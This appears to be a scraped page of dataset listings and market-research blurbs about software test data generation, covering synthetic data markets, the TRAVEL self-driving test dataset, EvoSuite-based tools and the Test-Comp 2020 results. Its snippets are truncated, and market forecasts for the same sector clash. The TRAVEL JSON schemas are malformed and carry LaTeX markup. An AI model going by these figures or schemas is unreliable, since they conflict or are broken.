Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
The appendix of our ICSE 2018 paper "Search-Based Test Data Generation for SQL Queries: Appendix".
The appendix contains:
https://www.wiseguyreports.com/pages/privacy-policy
| REPORT ATTRIBUTE | DETAILS |
| --- | --- |
| BASE YEAR | 2024 |
| HISTORICAL DATA | 2019 - 2023 |
| REGIONS COVERED | North America, Europe, APAC, South America, MEA |
| REPORT COVERAGE | Revenue Forecast, Competitive Landscape, Growth Factors, and Trends |
| MARKET SIZE 2024 | 3.08 (USD Billion) |
| MARKET SIZE 2025 | 3.56 (USD Billion) |
| MARKET SIZE 2035 | 15.0 (USD Billion) |
| SEGMENTS COVERED | Application, Deployment Type, End User, Testing Type, Regional |
| COUNTRIES COVERED | US, Canada, Germany, UK, France, Russia, Italy, Spain, Rest of Europe, China, India, Japan, South Korea, Malaysia, Thailand, Indonesia, Rest of APAC, Brazil, Mexico, Argentina, Rest of South America, GCC, South Africa, Rest of MEA |
| KEY MARKET DYNAMICS | Increasing demand for data privacy, Need for regulatory compliance, Rising importance of data quality, Growth of DevOps and Agile methodologies, Expanding cloud adoption and integration |
| MARKET FORECAST UNITS | USD Billion |
| KEY COMPANIES PROFILED | Informatica, IBM, Delphix, Oracle, Deloitte, DataMill, SAP, Micro Focus, Microsoft, Parasoft, GenRocket, Test Data Solutions, Tricentis |
| MARKET FORECAST PERIOD | 2025 - 2035 |
| KEY MARKET OPPORTUNITIES | Increased demand for automation, Growing need for data privacy, Rising adoption of DevOps practices, Expansion of cloud-based solutions, Surge in AI-driven testing tools |
| COMPOUND ANNUAL GROWTH RATE (CAGR) | 15.5% (2025 - 2035) |
According to our latest research, the global synthetic test data generation market size reached USD 1.85 billion in 2024 and is projected to grow at a robust CAGR of 31.2% during the forecast period, reaching approximately USD 21.65 billion by 2033. The market's remarkable growth is primarily driven by the increasing demand for high-quality, privacy-compliant data to support software testing, AI model training, and data privacy initiatives across multiple industries. As organizations strive to meet stringent regulatory requirements and accelerate digital transformation, the adoption of synthetic test data generation solutions is surging at an unprecedented rate.
A key growth factor for the synthetic test data generation market is the rising awareness and enforcement of data privacy regulations such as GDPR, CCPA, and HIPAA. These regulations have compelled organizations to rethink their data management strategies, particularly when it comes to using real data in testing and development environments. Synthetic data offers a powerful alternative, allowing companies to generate realistic, risk-free datasets that mirror production data without exposing sensitive information. This capability is particularly vital for sectors like BFSI and healthcare, where data breaches can have severe financial and reputational repercussions. As a result, businesses are increasingly investing in synthetic test data generation tools to ensure compliance, reduce liability, and enhance data security.
Another significant driver is the explosive growth in artificial intelligence and machine learning applications. AI and ML models require vast amounts of diverse, high-quality data for effective training and validation. However, obtaining such data can be challenging due to privacy concerns, data scarcity, or labeling costs. Synthetic test data generation addresses these challenges by producing customizable, labeled datasets that can be tailored to specific use cases. This not only accelerates model development but also improves model robustness and accuracy by enabling the creation of edge cases and rare scenarios that may not be present in real-world data. The synergy between synthetic data and AI innovation is expected to further fuel market expansion throughout the forecast period.
The increasing complexity of software systems and the shift towards DevOps and continuous integration/continuous deployment (CI/CD) practices are also propelling the adoption of synthetic test data generation. Modern software development requires rapid, iterative testing across a multitude of environments and scenarios. Relying on masked or anonymized production data is often insufficient, as it may not capture the full spectrum of conditions needed for comprehensive testing. Synthetic data generation platforms empower development teams to create targeted datasets on demand, supporting rigorous functional, performance, and security testing. This leads to faster release cycles, reduced costs, and higher software quality, making synthetic test data generation an indispensable tool for digital enterprises.
In the realm of synthetic test data generation, Synthetic Tabular Data Generation Software plays a crucial role. This software specializes in creating structured datasets that resemble real-world data tables, making it indispensable for industries that rely heavily on tabular data, such as finance, healthcare, and retail. By generating synthetic tabular data, organizations can perform extensive testing and analysis without compromising sensitive information. This capability is particularly beneficial for financial institutions that need to simulate transaction data or healthcare providers looking to test patient management systems. As the demand for privacy-compliant data solutions grows, the importance of synthetic tabular data generation software is expected to increase, driving further innovation and adoption in the market.
From a regional perspective, North America currently leads the synthetic test data generation market, accounting for the largest share in 2024, followed closely by Europe and Asia Pacific. The dominance of North America can be attributed to the presence of major technology providers, early adoption of advanced testing methodologies, and a strong regulatory focus on data privacy. Europe's stringent privacy regulations an
https://www.datainsightsmarket.com/privacy-policy
The Data Creation Tool market is booming, projected to reach $27.2 Billion by 2033, with a CAGR of 18.2%. Discover key trends, leading companies (Informatica, Delphix, Broadcom), and regional market insights in this comprehensive analysis. Explore how synthetic data generation is transforming software development, AI, and data analytics.
https://www.verifiedmarketresearch.com/privacy-policy/
Test Data Management Market size was valued at USD 1.54 Billion in 2024 and is projected to reach USD 2.97 Billion by 2032, growing at a CAGR of 11.19% from 2026 to 2032.
Test Data Management Market Drivers
Increasing Data Volumes: The exponential growth in data generated by businesses necessitates efficient management of test data. Effective TDM solutions help organizations handle large volumes of data, ensuring accurate and reliable testing processes.
Need for Regulatory Compliance: Stringent data privacy regulations, such as GDPR, HIPAA, and CCPA, require organizations to protect sensitive data. TDM solutions help ensure compliance by masking or anonymizing sensitive data used in testing environments.
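Masking, as described above, typically replaces each sensitive value with a stable surrogate so that masked test data stays referentially consistent across tables. A minimal, hypothetical sketch of this idea; the field names and salt are illustrative and not taken from any particular TDM product:

```python
# Hypothetical sketch of deterministic data masking: each sensitive value
# is replaced by a stable, irreversible token so joins still line up.
import hashlib

def mask_value(value: str, salt: str = "test-env") -> str:
    """Replace a sensitive value with a stable, irreversible token."""
    digest = hashlib.sha256((salt + value).encode("utf-8")).hexdigest()
    return digest[:12]

record = {"name": "Jane Doe", "ssn": "123-45-6789", "balance": 1024.50}
masked = {k: (mask_value(v) if k in {"name", "ssn"} else v) for k, v in record.items()}
print(masked)  # sensitive fields tokenized, non-sensitive fields untouched
```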
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This repository hosts the Testing Roads for Autonomous VEhicLes (TRAVEL) dataset. TRAVEL is an extensive collection of virtual roads that have been used for testing lane assist/keeping systems (i.e., driving agents), together with data from their execution in a state-of-the-art, physically accurate driving simulator called BeamNG.tech. Virtual roads consist of sequences of road points interpolated using cubic splines.
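Since roads are defined by road points interpolated with cubic splines, a road can be densified programmatically. A minimal sketch using SciPy; the sample points are made up for illustration and are not taken from the dataset:

```python
# Densify a virtual road from its road points with cubic splines,
# mirroring the interpolation described above.
import numpy as np
from scipy.interpolate import CubicSpline

road_points = np.array([[0.0, 0.0], [30.0, 10.0], [60.0, 5.0], [90.0, 25.0]])
t = np.linspace(0.0, 1.0, len(road_points))  # parameterize the polyline
spline_x = CubicSpline(t, road_points[:, 0])
spline_y = CubicSpline(t, road_points[:, 1])

t_dense = np.linspace(0.0, 1.0, 50)
interpolated_points = np.column_stack([spline_x(t_dense), spline_y(t_dense)])
print(interpolated_points[:3])  # first few interpolated road points
```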
Along with the data, this repository contains instructions on how to install the tooling necessary to generate new data (i.e., test cases) and analyze it in the context of regression testing. We focus on test selection and test prioritization, given their importance for developing high-quality software following DevOps practices.
This dataset builds on top of our previous work in this area, including work on:
- test generation (e.g., AsFault, DeepJanus, and DeepHyperion) and the SBST CPS tool competition (SBST2021),
- test selection (SDC-Scissor and the related tool), and
- test prioritization (automated test case prioritization work for SDCs).
Dataset Overview
The TRAVEL dataset is available under the data folder and is organized as a set of experiment folders. Each of these folders is generated by running the test generator (see below) and contains the configuration used for generating the data (experiment_description.csv), various statistics on the generated tests (generation_stats.csv) and on the found faults (oob_stats.csv). Additionally, the folders contain the raw test cases generated and executed during each experiment (test..json). A minimal sketch of iterating over these folders is shown below.
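The folder layout in the sketch follows this README, but the test-file glob pattern and the CSV contents are assumptions (the `test..json` pattern elides the test id):

```python
# Iterate over the experiment folders and summarize what each contains.
from pathlib import Path
import pandas as pd

for experiment in sorted(Path("data").iterdir()):
    if not experiment.is_dir():
        continue
    config = pd.read_csv(experiment / "experiment_description.csv")  # generation settings
    stats = pd.read_csv(experiment / "generation_stats.csv")         # test statistics
    tests = list(experiment.glob("test.*.json"))                     # assumed id pattern
    print(f"{experiment.name}: {len(tests)} test files, "
          f"{len(config.columns)} config fields, {len(stats.columns)} stat fields")
```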
The following sections describe what each of those files contains.
Experiment Description
The experiment_description.csv contains the settings used to generate the data, including:
Time budget. The overall generation budget in hours. This budget includes both the time to generate and execute the tests as driving simulations.
The size of the map. The size, in meters, of the squared map that defines the boundaries inside which the virtual roads develop.
The test subject. The driving agent that implements the lane-keeping system under test. The TRAVEL dataset contains data generated by testing the BeamNG.AI and the end-to-end Dave2 systems.
The test generator. The algorithm that generated the test cases. The TRAVEL dataset contains data obtained using various algorithms, ranging from naive and advanced random generators to complex evolutionary algorithms.
The speed limit. The maximum speed at which the driving agent under test can travel.
Out of Bound (OOB) tolerance. The test oracle parameter that defines how much of the ego-car may lie outside the lane boundaries before a test fails. This parameter ranges between 0.0 and 1.0: at 0.0, a test failure triggers as soon as any part of the ego-vehicle goes out of the lane boundary; at 1.0, a test failure triggers only if the entire body of the ego-car falls outside the lane (a minimal sketch of this oracle follows the list).
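As referenced in the last item above, the oracle reduces to a threshold check. Function and argument names, and the strict ">" boundary handling, are assumptions rather than the dataset's actual code:

```python
# Sketch of the OOB oracle: a test fails once the fraction of the
# ego-car lying outside the lane exceeds the configured tolerance.
def oob_failure(oob_percentage: float, oob_tolerance: float) -> bool:
    """True if the observed out-of-bound fraction breaches the tolerance."""
    return oob_percentage > oob_tolerance

assert oob_failure(0.10, 0.0)    # strict oracle: any part outside the lane fails
assert oob_failure(1.0, 0.95)    # tolerant oracle: only a full departure fails
assert not oob_failure(0.50, 0.95)
```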
Experiment Statistics
The generation_stats.csv contains statistics about the test generation, including:
Total number of generated tests. The number of tests generated during an experiment. This number is broken down into the number of valid tests and invalid tests. Valid tests contain virtual roads that do not self-intersect and contain turns that are not too sharp.
Test outcome. The test outcome contains the number of passed tests, failed tests, and tests in error. Passed and failed tests are defined by the OOB tolerance and an additional (implicit) oracle that checks whether the ego-car is moving or standing. Tests that did not pass because of other errors (e.g., the simulator crashed) are reported in a separate category.
The TRAVEL dataset also contains statistics about the failed tests, including the overall number of failed tests (total oob) and its breakdown into OOB that happened while driving left or right. Further statistics about the diversity (i.e., sparseness) of the failures are also reported.
Test Cases and Executions
Each test..json contains information about a test case and, if the test case is valid, the data observed during its execution as a driving simulation.
The data about the test case definition include:
The road points. The list of points in a 2D space that identify the center of the virtual road, and their interpolation using cubic splines (interpolated_points).
The test ID. The unique identifier of the test in the experiment.
Validity flag and explanation. A flag that indicates whether the test is valid or not, and a brief message describing why the test is not considered valid (e.g., the road contains sharp turns or self-intersects).
The test data are organized according to the following JSON Schema and can be interpreted as RoadTest objects provided by the tests_generation.py module.
{ "type": "object", "properties": { "id": { "type": "integer" }, "is_valid": { "type": "boolean" }, "validation_message": { "type": "string" }, "road_points": { §\label{line:road-points}§ "type": "array", "items": { "$ref": "schemas/pair" }, }, "interpolated_points": { §\label{line:interpolated-points}§ "type": "array", "items": { "$ref": "schemas/pair" }, }, "test_outcome": { "type": "string" }, §\label{line:test-outcome}§ "description": { "type": "string" }, "execution_data": { "type": "array", "items": { "$ref" : "schemas/simulationdata" } } }, "required": [ "id", "is_valid", "validation_message", "road_points", "interpolated_points" ] }
Finally, the execution data contain a list of timestamped state information recorded by the driving simulation. State information is collected at constant frequency and includes absolute position, rotation, and velocity of the ego-car, its speed in Km/h, and control inputs from the driving agent (steering, throttle, and braking). Additionally, execution data contain OOB-related data, such as the lateral distance between the car and the lane center and the OOB percentage (i.e., how much the car is outside the lane).
The simulation data adhere to the following (simplified) JSON Schema and can be interpreted as Python objects using the simulation_data.py module.
{ "$id": "schemas/simulationdata", "type": "object", "properties": { "timer" : { "type": "number" }, "pos" : { "type": "array", "items":{ "$ref" : "schemas/triple" } } "vel" : { "type": "array", "items":{ "$ref" : "schemas/triple" } } "vel_kmh" : { "type": "number" }, "steering" : { "type": "number" }, "brake" : { "type": "number" }, "throttle" : { "type": "number" }, "is_oob" : { "type": "number" }, "oob_percentage" : { "type": "number" } §\label{line:oob-percentage}§ }, "required": [ "timer", "pos", "vel", "vel_kmh", "steering", "brake", "throttle", "is_oob", "oob_percentage" ] }
Dataset Content
The TRAVEL dataset is a living initiative, so its content is subject to change. Currently, the dataset contains the data collected during the SBST CPS tool competition, and data collected in the context of our recent work on test selection (the SDC-Scissor work and tool) and test prioritization (automated test case prioritization work for SDCs).
SBST CPS Tool Competition Data
The data collected during the SBST CPS tool competition are stored inside data/competition.tar.gz. The file contains the test cases generated by Deeper, Frenetic, AdaFrenetic, and Swat, the open-source test generators submitted to the competition and executed against BeamNG.AI with an aggression factor of 0.7 (i.e., conservative driver).
| Name | Map Size (m x m) | Max Speed (Km/h) | Budget (h) | OOB Tolerance (%) | Test Subject |
| --- | --- | --- | --- | --- | --- |
| DEFAULT | 200 × 200 | 120 | 5 (real time) | 0.95 | BeamNG.AI - 0.7 |
| SBST | 200 × 200 | 70 | 2 (real time) | 0.5 | BeamNG.AI - 0.7 |
Specifically, the TRAVEL dataset contains 8 repetitions for each of the above configurations for each test generator totaling 64 experiments.
SDC Scissor
With SDC-Scissor we collected data based on the Frenetic test generator. The data is stored inside data/sdc-scissor.tar.gz. The following table summarizes the used parameters.
| Name | Map Size (m x m) | Max Speed (Km/h) | Budget (h) | OOB Tolerance (%) | Test Subject |
| --- | --- | --- | --- | --- | --- |
| SDC-SCISSOR | 200 × 200 | 120 | 16 (real time) | 0.5 | BeamNG.AI - 1.5 |
The dataset contains 9 experiments with the above configuration. To generate your own data with SDC-Scissor, follow the instructions in its repository.
Dataset Statistics
Here is an overview of the TRAVEL dataset: generated tests, executed tests, and faults found by all the test generators, grouped by experiment configuration. Some 25,845 test cases were generated by running 4 test generators 8 times in 2 configurations using the SBST CPS Tool Competition code pipeline (SBST in the table). We ran the test generators for 5 hours, allowing the ego-car a generous speed limit (120 Km/h) and defining a high OOB tolerance (i.e., 0.95); we also ran the test generators using a smaller generation budget (i.e., 2 hours) and speed limit (i.e., 70 Km/h) while setting the OOB tolerance to a lower value (i.e., 0.5). We also collected some 5,971 additional tests with SDC-Scissor (SDC-Scissor in the table) by running it 9 times for 16 hours using Frenetic as the test generator and defining a more realistic OOB tolerance (i.e., 0.50).
Generating new Data
Generating new data, i.e., test cases, can be done using the SBST CPS Tool Competition pipeline and the driving simulator BeamNG.tech.
Extensive instructions on how to install both tools are provided in the SBST CPS Tool Competition pipeline documentation.
https://www.archivemarketresearch.com/privacy-policy
The global database testing tool market is anticipated to experience substantial growth in the coming years, driven by factors such as the increasing adoption of cloud-based technologies, the rising demand for data quality and accuracy, and the growing complexity of database systems. The market is expected to reach a value of USD 1,542.4 million by 2033, expanding at a CAGR of 7.5% during the forecast period of 2023-2033. Key players in the market include Apache JMeter, DbFit, SQLMap, Mockup Data, SQL Test, NoSQLUnit, Orion, ApexSQL, QuerySurge, DBUnit, DataFactory, DTM Data Generator, Oracle, SeLite, SLOB, and others. The North American region is anticipated to hold a significant share of the database testing tool market, followed by Europe and Asia Pacific. The increasing adoption of cloud-based database testing services, the presence of key market players, and the growing demand for data testing and validation are driving the market growth in North America. Asia Pacific, on the other hand, is expected to experience the highest growth rate due to the rapidly increasing IT spending, the emergence of new technologies, and the growing number of businesses investing in data quality management solutions.
https://dataintelo.com/privacy-and-policy
According to our latest research, the global synthetic IoT data generation market size stood at USD 1.15 billion in 2024, with a robust compound annual growth rate (CAGR) of 36.8% expected from 2025 to 2033. This trajectory will drive the market to a projected value of USD 17.8 billion by 2033. The market's exponential growth is attributed to the surging demand for high-quality, privacy-compliant, and scalable data for Internet of Things (IoT) applications across diverse industries. As per the latest research, the adoption of synthetic data generation solutions is accelerating as enterprises seek to overcome challenges related to data availability, privacy, and regulatory compliance, thereby fueling innovation and operational efficiency in IoT ecosystems worldwide.
The primary growth factor for the synthetic IoT data generation market is the increasing need for vast, diverse, and high-fidelity data to train, validate, and test IoT systems, particularly in environments where real-world data is either insufficient, sensitive, or unavailable. As IoT deployments proliferate across sectors such as healthcare, automotive, manufacturing, and smart cities, the complexity and variety of data needed for robust algorithm development have grown exponentially. Synthetic data generation enables organizations to simulate a wide range of scenarios, edge cases, and rare events, ensuring that IoT solutions are more resilient, accurate, and secure. This capability not only accelerates product development cycles but also reduces dependency on costly and time-consuming real-world data collection efforts, making it an indispensable tool for modern IoT-driven enterprises.
Another significant driver is the heightened focus on data privacy and regulatory compliance. With the introduction of stringent data protection laws such as GDPR in Europe, CCPA in California, and similar regulations worldwide, organizations are under increasing pressure to minimize the use of actual personal or sensitive data in their IoT applications. Synthetic data, by its very nature, eliminates direct identifiers and can be generated to mimic real data distributions without exposing actual user information. This makes it an ideal solution for organizations seeking to comply with global privacy mandates while still gaining actionable insights from IoT data. As regulators continue to tighten data usage norms, the adoption of synthetic IoT data generation tools is expected to surge, further propelling market growth.
Technological advancements in artificial intelligence and machine learning have also played a pivotal role in shaping the synthetic IoT data generation market. Modern synthetic data platforms leverage advanced AI models, such as generative adversarial networks (GANs) and variational autoencoders (VAEs), to produce highly realistic and contextually rich datasets that mirror the complexity of real-world IoT environments. This has enabled organizations to simulate intricate sensor networks, device interactions, and environmental variables with remarkable accuracy. As the technology matures, the fidelity and utility of synthetic data continue to improve, opening new avenues for innovation in IoT analytics, predictive maintenance, and autonomous systems. The convergence of AI and IoT is thus creating a virtuous cycle, driving demand for synthetic data solutions that empower next-generation digital transformation initiatives.
From a regional perspective, North America currently dominates the synthetic IoT data generation market, driven by the presence of leading technology providers, a mature IoT ecosystem, and a strong emphasis on research and development. The region's early adoption of AI, coupled with a proactive regulatory stance on data privacy, has fostered a conducive environment for synthetic data innovation. Meanwhile, Asia Pacific is emerging as the fastest-growing market, fueled by rapid industrialization, smart city initiatives, and increasing investments in IoT infrastructure across countries such as China, India, and Japan. Europe follows closely, with its focus on data protection and digital transformation. Other regions, including Latin America and the Middle East & Africa, are gradually catching up, leveraging synthetic data to overcome local data scarcity and regulatory hurdles. Overall, the global landscape is witnessing a convergence of technological, regulatory, and market forces that are collectively driving the adoption of synthetic IoT data generation solutions.
https://www.datainsightsmarket.com/privacy-policy
The global database testing tool market size was valued at USD 2,504.2 million in 2025 and is projected to reach USD 19,405.8 million by 2033, exhibiting a CAGR of 33.6% during the forecast period. The growth of the market is attributed to the rising demand for ensuring the accuracy and reliability of database systems, increasing adoption of cloud-based database testing tools, and growing need for automated database testing solutions to improve efficiency. Key market trends include the advancement of artificial intelligence (AI) and machine learning (ML) technologies in database testing tools, which enables automated test case generation, data validation, and performance optimization. Additionally, the increasing adoption of agile development methodologies and DevOps practices has led to the demand for continuous database testing tools that can integrate seamlessly with CI/CD pipelines. The market is also witnessing the emergence of database testing tools specifically designed for specific database types, such as NoSQL and NewSQL databases, to meet the unique testing requirements of these systems.
The NIST BGP RPKI IO framework (BRIO) is a test-tool-only subset of the BGP-SRx Framework. It is an open-source implementation and test platform that allows the synthetic generation of test data for emerging BGP security extensions such as RPKI Origin Validation, BGPSec Path Validation, and ASPA validation. BRIO is designed such that it allows the creation of standalone testbeds, loaded with freely configurable scenarios, to study secure BGP implementations; as a result, it provides a broad range of functionality.
https://www.technavio.com/content/privacy-notice
AI Testing And Validation Market Size 2025-2029
The AI testing and validation market is forecast to increase by USD 806.7 million, at a CAGR of 18.3% from 2024 to 2029. The proliferation of complex AI models, particularly generative AI, will drive the AI testing and validation market.
Market Insights
North America dominated the market and is expected to account for 40% of the market's growth during 2025-2029.
By Application - Test automation segment was valued at USD 218.70 million in 2023
By Deployment - Cloud based segment accounted for the largest market revenue share in 2023
Market Size & Forecast
Market Opportunities: USD 360.90 million
Market Future Opportunities 2024: USD 806.70 million
CAGR from 2024 to 2029: 18.3%
Market Summary
The market is witnessing significant growth due to the increasing adoption of artificial intelligence (AI) technologies across various industries. The proliferation of complex AI models, particularly generative AI, is driving the need for robust testing and validation processes to ensure accuracy, reliability, and security. The convergence of AI validation with MLOps (Machine Learning Operations) and the shift left imperative are key trends shaping the market. The black box nature of advanced AI systems poses a challenge in testing and validation, as traditional testing methods may not be effective. Organizations are seeking standardized metrics and tools to assess the performance, fairness, and explainability of AI models. For instance, in a supply chain optimization scenario, a retailer uses AI to predict demand and optimize inventory levels. Effective AI testing and validation are crucial to ensure the accuracy of demand forecasts, maintain compliance with regulations, and improve operational efficiency. In conclusion, the market is a critical enabler for the successful deployment and integration of AI systems in businesses worldwide. As AI technologies continue to evolve, the demand for reliable testing and validation solutions will only grow.
What will be the size of the AI Testing And Validation Market during the forecast period?
The market continues to evolve, with companies increasingly recognizing the importance of ensuring the accuracy, reliability, and ethical use of artificial intelligence models. AI model testing and validation encompass various aspects, including test coverage, model monitoring, debugging, and compliance. According to recent studies, companies have seen a significant improvement in model explainability and quality assurance through rigorous testing and validation processes. For instance, implementing AI model governance has led to a 25% reduction in bias mitigation incidents. Furthermore, AI test results have become a crucial factor in product strategy, as they directly impact compliance and budgeting decisions. AI testing tools and strategies have advanced significantly, offering more efficient test reporting and risk assessment capabilities. As AI models become more integrated into business operations, the need for robust testing and validation processes will only grow.
Unpacking the AI Testing And Validation Market Landscape
In the realm of software development, Artificial Intelligence (AI) is increasingly being integrated into testing and validation processes to enhance efficiency and accuracy. Compared to traditional testing methods, AI testing solutions offer a 30% faster test execution rate, enabling continuous delivery and integration. Furthermore, AI model testing and validation result in a 25% reduction in false positives, improving Return on Investment (ROI) by minimizing unnecessary rework.
Test data management and generation are streamlined through AI-driven synthetic data generation, ensuring reliable performance benchmarking and compliance alignment. AI also plays a crucial role in bias detection and fairness evaluation, enhancing system trustworthiness and user experience.
Continuous integration and delivery are facilitated by automated AI testing frameworks, offering robustness evaluation, scalability testing, and behavior-driven development. Regression testing and performance testing are also optimized through AI, ensuring model interpretability and explainable AI metrics.
Security audits are strengthened with AI-driven vulnerability detection and adversarial attack testing, safeguarding against potential threats and maintaining system reliability. Overall, AI integration in testing and validation processes leads to improved efficiency, accuracy, and security, making it an essential component of modern software development.
Key Market Drivers Fueling Growth
The proliferation of intricate artificial intelligence models, with a notable focus on generative AI, serves as the primary catalyst for market growth. The market is experiencing significant growth due to
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Attribute Information
test case generation; unit testing; search-based software engineering; benchmark
Paper Abstract
Several promising techniques have been proposed to automate different tasks in software testing, such as test data generation for object-oriented software. However, reported studies in the literature only show the feasibility of the proposed techniques, because the choice of the employed artifacts in the case studies (e.g., software applications) is usually done in a non-systematic way. The chosen case study might be biased, and so it might not be a valid representative of the addressed type of software (e.g., internet applications and embedded systems). The common trend seems to be to accept this fact and get over it by simply discussing it in a threats to validity section. In this paper, we evaluate search-based software testing (in particular the EvoSuite tool) when applied to test data generation for open source projects. To achieve sound empirical results, we randomly selected 100 Java projects from SourceForge, which is the most popular open source repository (more than 300,000 projects with more than two million registered users). The resulting case study not only is very large (8,784 public classes for a total of 291,639 bytecode level branches), but more importantly it is statistically sound and representative for open source projects. Results show that while high coverage on commonly used types of classes is achievable, in practice environmental dependencies prohibit such high coverage, which clearly points out essential future research directions. To support this future research, our SF100 case study can serve as a much needed corpus of classes for test generation.
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This record provides all contents of our work, NPETest, including all raw experimental data used in our paper, which will be published at ASE '24.
NPETest is a unit test generation tool for Java projects that utilizes both static and dynamic analysis techniques for effective NPE detection. The tool is implemented on top of EvoSuite, a publicly available unit test generation tool for Java.
For more technical details, please read our paper, which will be published at ASE '24.
The descriptions for the uploaded files are as follows:
npetest_result.zip: results of NPETest for all benchmarks, containing the generated test cases
evosuite_opt_result.zip: results of EvoSuite with fine-tuned options for all benchmarks, containing the generated test cases
evosuite_def_result.zip: results of EvoSuite with default options for all benchmarks, containing the generated test cases
randoop_NPEX.tar.gz: results of Randoop for the NPEX benchmarks, containing only the log files
randoop_other.tar.gz: results of Randoop for the Bears, BugSwarm, Defects4J, and Genesis benchmarks, containing only the log files
subject_gits.tar.gz: information on the buggy version of each benchmark
NPETestArtifact-main.zip: all contents of NPETest from the public GitHub repository NPETestArtifact
A detailed description of NPETest (e.g., installation, usage) is available in the public repository: NPETestArtifact.
You can also download the VM from the following link: Zenodo
MIT License: https://opensource.org/licenses/MIT
License information was derived automatically
Description: This dataset contains 5 sample PDF Electronic Health Records (EHRs), generated as part of a synthetic healthcare data project. The purpose of this dataset is to assist with sales distribution, offering potential users and stakeholders a glimpse of how synthetic EHRs can look and function. These records have been crafted to mimic realistic admission data while ensuring privacy and compliance with all data protection regulations.
Key Features:
1. Synthetic Data: Entirely artificial data created for testing and demonstration purposes.
2. PDF Format: Records are presented in PDF format, commonly used in healthcare systems.
3. Diverse Use Cases: Useful for evaluating tools related to data parsing, machine learning in healthcare, or EHR management systems.
4. Rich Admission Details: Includes admission-related data that highlights the capabilities of synthetic EHR generation.
Potential Use Cases:
Feel free to use this dataset for non-commercial testing and demonstration purposes. Feedback and suggestions for improvements are always welcome!
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Replication package for the 2025 edition of the Java Testing Tool Competition at SBFT.
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This archive contains the results of the 2nd Competition on Software Testing (Test-Comp 2020) https://test-comp.sosy-lab.org/2020/
The competition was run by Dirk Beyer, LMU Munich, Germany. More information is available in the following article: Dirk Beyer. Second Competition on Software Testing: Test-Comp 2020. In Proceedings of the 23rd International Conference on Fundamental Approaches to Software Engineering (FASE 2020, Dublin, April 28-30), 2020. Springer. https://doi.org/10.1007/978-3-030-45234-6_25
Copyright (C) Dirk Beyer https://www.sosy-lab.org/people/beyer/
SPDX-License-Identifier: CC-BY-4.0 https://spdx.org/licenses/CC-BY-4.0.html
To browse the competition results with a web browser, there are two options:
- start a local web server using php -S localhost:8000 in order to view the data in this archive, or
- browse https://test-comp.sosy-lab.org/2020/results/ in order to view the data on the Test-Comp web page.
Contents:
index.html: directs to the overview web page
LICENSE.txt: specifies the license
README.txt: this file
results-validated/: results of coverage-validation runs
results-verified/: results of test-generation runs and aggregated results
The folder results-validated/ contains the results from coverage-validation runs:
The folder results-verified/ contains the results from test-generation runs and aggregated results:
index.html: overview web page with rankings and score table
design.css: HTML style definitions
*.xml.bz2: XML results from BenchExec
*.merged.xml.bz2: XML results from BenchExec, status adjusted according to the validation results
*.logfiles.zip: output from tools
*.json.gz: mapping from file names to SHA-256 hashes for the file content
*.xml.bz2.table.html: HTML views on the detailed results data, as generated by BenchExec's table generator
.All.table.html: HTML views of the full benchmark set (all categories) for each tool
META_.table.html: HTML views of the benchmark set for each meta category, for each tool and over all tools
*.table.html: HTML views of the benchmark set for each category over all tools
iZeCa0gaey.html: HTML views per tool
quantilePlot-*: score-based quantile plots as visualization of the results
quantilePlotShow.gp: example Gnuplot script to generate a plot
score*: accumulated score results in various formats
The hashes of the file names (in the files *.json.gz) are useful for:
- validating the exact contents of a file, and
- accessing the files from the witness store.
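Assuming each *.json.gz file is a flat JSON object mapping file names to SHA-256 hex digests (the exact structure is not spelled out in this README), verification could look like this sketch:

```python
# Verify a result file against the name-to-hash mapping.
import gzip
import hashlib
import json

with gzip.open("results-verified/example.json.gz", "rt") as fh:  # hypothetical file name
    name_to_hash = json.load(fh)

def verify(path: str) -> bool:
    """True if the file content matches its recorded SHA-256 hash."""
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest() == name_to_hash[path]
```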
Overview of the archives from Test-Comp 2020 that are available at Zenodo:
- https://doi.org/10.5281/zenodo.3678275: Witness store (containing the generated test suites)
- https://doi.org/10.5281/zenodo.3678264: Results (XML result files, log files, file mappings, HTML tables)
- https://doi.org/10.5281/zenodo.3678250: Test tasks, version testcomp20
- https://doi.org/10.5281/zenodo.3574420: BenchExec, version 2.5.1
All benchmarks were executed for Test-Comp 2020 (https://test-comp.sosy-lab.org/2020/) by Dirk Beyer, LMU Munich, based on the following components:
- git@github.com:sosy-lab/sv-benchmarks.git testcomp20-0-gd6cd3e5dd4
- git@gitlab.com:sosy-lab/test-comp/bench-defs.git testcomp19-84-gac76836
- git@github.com:sosy-lab/benchexec.git 2.5.1-0-gffad635
Feel free to contact me in case of questions: https://www.sosy-lab.org/people/beyer/
According to our latest research, the global synthetic data for security market size reached USD 1.42 billion in 2024, with a robust year-on-year growth trajectory. The market is expected to expand at a CAGR of 36.8% from 2025 to 2033, projecting a substantial increase to USD 19.82 billion by 2033. This exceptional growth is primarily driven by the escalating demand for advanced data security solutions and the rising adoption of artificial intelligence (AI) and machine learning (ML) technologies that rely on synthetic data for secure and compliant data modeling. As organizations worldwide intensify their focus on data privacy and regulatory compliance, synthetic data solutions have emerged as a critical tool for mitigating security risks and enhancing cyber resilience.
One of the primary growth factors fueling the synthetic data for security market is the exponential increase in data breaches and cyberattacks across industries. With the proliferation of digital transformation initiatives, organizations are generating and managing unprecedented volumes of sensitive data, making them attractive targets for malicious actors. Traditional security measures often fall short in protecting against sophisticated cyber threats, creating a pressing need for innovative approaches such as synthetic data generation. By leveraging synthetic data, security teams can simulate various attack scenarios, test their defense mechanisms, and train AI-based threat detection models without exposing real, sensitive information. This not only enhances the efficacy of security protocols but also ensures compliance with stringent data protection regulations such as GDPR, HIPAA, and CCPA.
